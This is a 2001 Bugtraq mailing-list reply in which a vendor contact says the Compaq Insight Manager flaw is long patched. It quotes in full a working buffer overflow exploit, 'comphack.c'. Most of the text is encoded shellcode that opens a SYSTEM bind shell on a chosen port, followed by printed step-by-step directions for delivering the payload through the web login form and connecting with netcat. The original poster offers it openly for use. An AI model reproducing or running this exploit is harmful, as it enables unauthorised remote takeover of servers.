re: comphack - Compaq Insight Manager Remote SYSTEM shell This has been fixed for at least 18 months. We suggest that you get the current release of software of agents and Compaq Insight manager. Version 5.2 or 5.1 it's on the web.... http://www.compaq.com/products/servers/management/ and so the are the old advisories... www.compaq.com/products/servers/management/system-advisories.html regards, Rich -----Original Message----- From: Indigo [mailto:indig0@talk21.com] Sent: Thursday, November 29, 2001 4:55 AM To: bugtraq@securityfocus.com Subject: comphack - Compaq Insight Manager Remote SYSTEM shell Mailer: SecurityFocus I'm running out of Win32 vulnerabilities to exploit here...Anyone got any ideas? Cheers, Indigo. /* comphack.c - Compaq Insight Manager overflow exploit by Indigo <indig0@talk21.com> 2001 Usage: comphack <victim port> This code has been compiled and tested on Linux and Win32 The shellcode spawns a SYSTEM shell on the chosen port Main shellcode adapted from code written by izan@deepzone.org Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ /* #include <windows.h> uncomment if compiling on Win32 */ #include <stdio.h> int main(int argc, char **argv) { unsigned char shellcode[] = "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77 \xFF\xE1\x03\x10" "\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7 \x31\xC9\xB1\x6F" "\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07 \x31\xDB\xB3\x18" "\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3 \x1D\x01\xDF\x29\x07" "\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07 \xB3\x05\x01\xDF" "\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07 \xB3\x12\x01\xDF" "\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01 \xDF\x29\x07\xB3\x14" "\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3 \x3F\x01\xDF\x29\x07" "\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07 \xB3\x08\x01\xDF" "\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01 \xDF\x29\x07\x66\x81" "\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07 \x47\x47\x47\x47" "\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7 \x5F\x5F\x5F\x5F" "\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2 \xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5" "\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7 \xAD\x5D\x5F\x5F\xD2" "\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35 \x55\xCF\xCF\xCF" "\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09" "\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09\xA0\xCA" "\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09\xD2\xEA\xB2" "\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0 \xCA\x6C\x7A\x1F" "\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2 \xEA\xAA\x7A\x1F" "\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79 \x1F\x5F\xF2\x0F" "\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79 \x1F\x5F\xF2\x0F\xA0\xCA" "\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2 \xE2\x72\x79\x1F\x5F" "\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2 \x6E\x79\x1F\x5F\xF4\xD2" "\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79 \x1F\x5F\x5F\x5F\x5F\x5F" "\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2 \xEA\x66\x79\x1F\x5F" "\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35 \x5F\x35\x4F\x35\x5E" "\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35 \x5F\xA0\xCA\x64" "\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37 \x5F\x5D\x5F\x5F\xA0\xCA" "\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79 \x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F" "\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2 \xEA\xB6\x7A\x1F" "\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35 \x5C\x0C\xA0\xCA\x5D\x7A" "\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09" "\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79 \x1F\x5F\xF4\x6C\xBF" "\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2 \xEA\xB6\x7A\x1F" "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F" "\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2 \x3A\x79\x1F\x5F\x08" "\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x60\x7A\x1F" "\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2 \x3A\x79\x1F\x5F\x5D" "\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79 \x1F\x5F\x5E\x7F\x5F\x5F" "\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79 \x1F\x5F\x5F\x7F\x5F\x5F" "\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79 \x1F\x5F\x08\x0F" "\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6 \x7A\x1F\x5F\xF2\x0F\xA0" "\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10 \x7A\x1F\x5F\xD4\xDA\x3A" "\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2\xEA" "\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55 \x7A\x1F\x5F\x35\x5F\xD2\xE2" "\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2 \xEA\xB6\x7A\x1F" "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F" "\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38 \xA0\xA0\xA0\x35" "\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2" "\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51 \x7A\x1F\x5F\xD6\xDA\x3E" "\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08 \x0F\xD2\xEA\x0E" "\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2 \x0F\xA0\xCA\x14" "\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35 \x5F\xD4\xDA\x3E" "\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4 \xDA\x0E\x79\x1F" "\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x18\x7A\x1F\x5F" "\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0 \xA0\xD2\xEA\x06" "\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2 \xEA\x02\x79\x1F" "\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0 \xCA\x08\x7A\x1F" "\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\x04\x06\x08" "\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\xF3\xDB" "\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10 \x1C\x14\x6C\x6D" "\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31 \x3B\x5F\x33\x36\x2C" "\x2B\x3A\x31 \x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31 \x3B\x5F" "\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30 \x3C\x34\x3A\x2B" "\x5F\x14\x1A\x2D\x11\x1A\x13 \x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A" "\x0F\x36\x2F\x3A\x5F\x18 \x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16" "\x31\x39\x30 \x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30 \x3C\x3A" "\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32 \x3A\x3B\x0F\x36\x2F" "\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30 \x3C\x5F\x2D\x3A" "\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36 \x2B\x3A\x19\x36\x33\x3A" "\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30 \x2C\x3A\x17\x3E\x31\x3B" "\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30 \x3C\x3A\x2C\x2C\x5F\x1C" "\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31 \x7F\x63\x36\x25" "\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71 \x30\x2D\x38\x61" "\x5D\x5F\x40\x17 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F" "\x53 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x 5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x1C\x12\x1B\x71\x1A\x07 \x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x56\x56\x56\x56\x56\x00"; FILE *fp; unsigned short int a_port; printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n"); printf ("This program will generate a binary file called exploit.bin\n"); printf ("Connect to the victim using a web browser http://victim:2301\n";); printf ("Next to \'Login Account\', click on \'anonymous\'\n"); printf ("Enter some random characters into the \'password\' field\n"); printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n"); printf ("Paste the exploit into the \'Name\' field and click OK\n"); printf ("\nLaunch netcat: nc <victim host> <victim port>\n"); printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n"); if (argc != 2) { printf ("Usage: %s <victim port>\n", argv[0]); exit (0); } a_port = htons(atoi(argv[1])); a_port^= 0x5f5f; shellcode[1650]= (a_port) & 0xff; shellcode[1651]= (a_port >> 8) & 0xff; fp = fopen ("./exploit.bin","wb"); fputs (shellcode,fp); fclose (fp); return 0; }
